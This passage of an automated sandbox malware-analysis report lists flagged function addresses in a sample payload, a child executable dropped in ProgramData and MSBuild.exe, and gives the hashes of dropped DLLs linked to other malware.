Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C29F280

Detected potential crypto function

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EBD50	0_2_003EBD50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EA130	0_2_003EA130
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E9B30	0_2_003E9B30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E9B58	0_2_003E9B58
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2935A0	0_2_6C2935A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30542B	0_2_6C30542B
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30AC00	0_2_6C30AC00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D5C10	0_2_6C2D5C10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E2C10	0_2_6C2E2C10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A5440	0_2_6C2A5440
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30545C	0_2_6C30545C
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F34A0	0_2_6C2F34A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FC4A0	0_2_6C2FC4A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A6C80	0_2_6C2A6C80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29D4E0	0_2_6C29D4E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D6CF0	0_2_6C2D6CF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A64C0	0_2_6C2A64C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BD4D0	0_2_6C2BD4D0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AFD00	0_2_6C2AFD00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BED10	0_2_6C2BED10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C0512	0_2_6C2C0512
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F85F0	0_2_6C2F85F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D0DD0	0_2_6C2D0DD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F9E30	0_2_6C2F9E30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E5600	0_2_6C2E5600
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D7E10	0_2_6C2D7E10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C306E63	0_2_6C306E63
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29C670	0_2_6C29C670
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E2E4E	0_2_6C2E2E4E
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B4640	0_2_6C2B4640
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B9E50	0_2_6C2B9E50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D3E50	0_2_6C2D3E50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F4EA0	0_2_6C2F4EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FE680	0_2_6C2FE680
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B5E90	0_2_6C2B5E90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3076E3	0_2_6C3076E3
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29BEF0	0_2_6C29BEF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AFEF0	0_2_6C2AFEF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A9F00	0_2_6C2A9F00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D7710	0_2_6C2D7710
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E77A0	0_2_6C2E77A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29DFE0	0_2_6C29DFE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C6FF0	0_2_6C2C6FF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DB820	0_2_6C2DB820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E4820	0_2_6C2E4820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A7810	0_2_6C2A7810
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DF070	0_2_6C2DF070
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B8850	0_2_6C2B8850
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BD850	0_2_6C2BD850
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C60A0	0_2_6C2C60A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BC0E0	0_2_6C2BC0E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D58E0	0_2_6C2D58E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3050C7	0_2_6C3050C7
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30B170	0_2_6C30B170
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AD960	0_2_6C2AD960
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2EB970	0_2_6C2EB970
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BA940	0_2_6C2BA940
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29C9A0	0_2_6C29C9A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CD9B0	0_2_6C2CD9B0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D5190	0_2_6C2D5190
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F2990	0_2_6C2F2990
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D9A60	0_2_6C2D9A60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C302AB0	0_2_6C302AB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2922A0	0_2_6C2922A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C4AA0	0_2_6C2C4AA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2ACAB0	0_2_6C2ACAB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30BA90	0_2_6C30BA90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B1AF0	0_2_6C2B1AF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DE2F0	0_2_6C2DE2F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D8AC0	0_2_6C2D8AC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DD320	0_2_6C2DD320
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AC370	0_2_6C2AC370
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C295340	0_2_6C295340
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29F380	0_2_6C29F380
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3053C8	0_2_6C3053C8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C406C00	0_2_6C406C00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34AC60	0_2_6C34AC60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C41AC30	0_2_6C41AC30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C39ECD0	0_2_6C39ECD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C33ECC0	0_2_6C33ECC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C46AD50	0_2_6C46AD50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C40ED70	0_2_6C40ED70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C4C8D20	0_2_6C4C8D20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C344DB0	0_2_6C344DB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C4CCDC0	0_2_6C4CCDC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3D6D90	0_2_6C3D6D90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3DEE70	0_2_6C3DEE70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C420E20	0_2_6C420E20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3C6E90	0_2_6C3C6E90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34AEC0	0_2_6C34AEC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3E0EC0	0_2_6C3E0EC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C346F10	0_2_6C346F10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C402F70	0_2_6C402F70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480F20	0_2_6C480F20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3AEF40	0_2_6C3AEF40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34EFB0	0_2_6C34EFB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C41EFF0	0_2_6C41EFF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C340FE0	0_2_6C340FE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C488FB0	0_2_6C488FB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C414840	0_2_6C414840
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C390820	0_2_6C390820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3CA820	0_2_6C3CA820
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014BE118	4_2_014BE118
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014BEE80	4_2_014BEE80
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3BC1	4_2_014B3BC1
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3C28	4_2_014B3C28
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3E71	4_2_014B3E71
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3E80	4_2_014B3E80
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B4948	4_2_054B4948
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B2106	4_2_054B2106
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B7D20	4_2_054B7D20
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9470	4_2_054B9470
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BBC91	4_2_054BBC91
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9EC8	4_2_054B9EC8
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCD50	4_2_054BCD50
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCD60	4_2_054BCD60
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B7D10	4_2_054B7D10
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B4939	4_2_054B4939
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B2C38	4_2_054B2C38
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B5C88	4_2_054B5C88
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BA758	4_2_054BA758
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BB230	4_2_054BB230
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9EB7	4_2_054B9EB7
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_05A61B10	4_2_05A61B10
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_05A63036	4_2_05A63036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041BD50	6_2_0041BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041A130	6_2_0041A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419B58	6_2_00419B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419B30	6_2_00419B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE24CF0	6_2_1FE24CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE112A8	6_2_1FE112A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF79CC0	6_2_1FF79CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1292D	6_2_1FE1292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF39A20	6_2_1FF39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEC5940	6_2_1FEC5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11C9E	6_2_1FE11C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13E3B	6_2_1FE13E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FECD6D0	6_2_1FECD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB9690	6_2_1FEB9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF79430	6_2_1FF79430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA53B0	6_2_1FEA53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FFED209	6_2_1FFED209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF35040	6_2_1FF35040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE29000	6_2_1FE29000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38D2A	6_2_1FE38D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF14A60	6_2_1FF14A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11EF1	6_2_1FE11EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38763	6_2_1FE38763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE74760	6_2_1FE74760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA8760	6_2_1FEA8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38680	6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF50480	6_2_1FF50480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13AB2	6_2_1FE13AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE98120	6_2_1FE98120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE90090	6_2_1FE90090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF38030	6_2_1FF38030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1290A	6_2_1FE1290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3BAB0	6_2_1FE3BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1251D	6_2_1FE1251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE43370	6_2_1FE43370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1F160	6_2_1FE1F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1174E	6_2_1FE1174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE72EE0	6_2_1FE72EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FFEAEBE	6_2_1FFEAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE56E80	6_2_1FE56E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE119DD	6_2_1FE119DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13580	6_2_1FE13580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1EA80	6_2_1FE1EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1AA40	6_2_1FE1AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF69C0	6_2_1FEF69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF0A940	6_2_1FF0A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF2A900	6_2_1FF2A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1481D	6_2_1FE1481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF4E800	6_2_1FF4E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE266C0	6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12018	6_2_1FE12018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF0A590	6_2_1FF0A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3A560	6_2_1FE3A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE147AF	6_2_1FE147AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE9A0B0	6_2_1FE9A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1209F	6_2_1FE1209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12AA9	6_2_1FE12AA9

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

